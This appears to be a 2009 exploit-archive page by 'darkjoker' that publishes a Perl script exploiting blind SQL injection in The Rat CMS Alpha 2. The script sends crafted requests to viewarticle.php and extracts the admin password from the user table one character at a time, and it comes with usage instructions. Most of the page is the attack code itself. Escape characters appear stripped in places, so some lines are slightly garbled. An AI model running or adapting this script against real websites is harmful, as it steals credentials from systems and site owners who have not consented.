[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit
# Published : 2009-01-04
# Author : darkjoker
# Previous Title : plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability
# Next Title : Lito Lite CMS Multiple Cross Site Scripting / Blind SQL Injection Exploit
#--+++=============================================================+++--#
#--+++====== The Rat CMS Alpha 2 Blind SQL Injection Exploit ======+++--#
#--+++=============================================================+++--#
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
sub query {
my $chr = shift;
my $pos = shift;
my $query = "'x' OR ASCII(SUBSTRING((SELECT user_password FROM tbl_auth_user WHERE user_id = 'theadmin'),${pos},1))=${chr}";
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}
sub check {
my $host = shift;
my $path = shift;
my $chr = ord (shift);
my $pos = shift;
my $sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
);
my $query = query ($chr, $pos);
print $sock "GET ${path}/viewarticle.php?id=${query} HTTP1.1rnrn";
my $x;
while (<$sock>)
{
$x .= $_;
}
$x =~ s/s/ /g;
$x =~ /<h1 align="center">(.+?)/h1>/;
if (length ($1) > 1)
{
return 1;
}
else
{
return 0;
}
close ($sock);
}
sub usage {
print
"n[+] The Rat CMS Alpha 2 Blind SQL Injection Exploit".
"n[+] Author: darkjoker".
"n[+] Site: http://darkjoker.net23.net".
"n[+] Usage: perl $0 <hostname> <path>".
"n[+] Greetz: certaindeathn";
exit ();
}
my $host = shift;
my $path = shift or usage;
my @key = split '', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*';
my $pos = 1;
my $chr = 0;
while ($pos <= 32)
{
if (check ($host, $path, $key [$chr], $pos))
{
print $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
print "n";
# www.Syue.com [2009-01-04]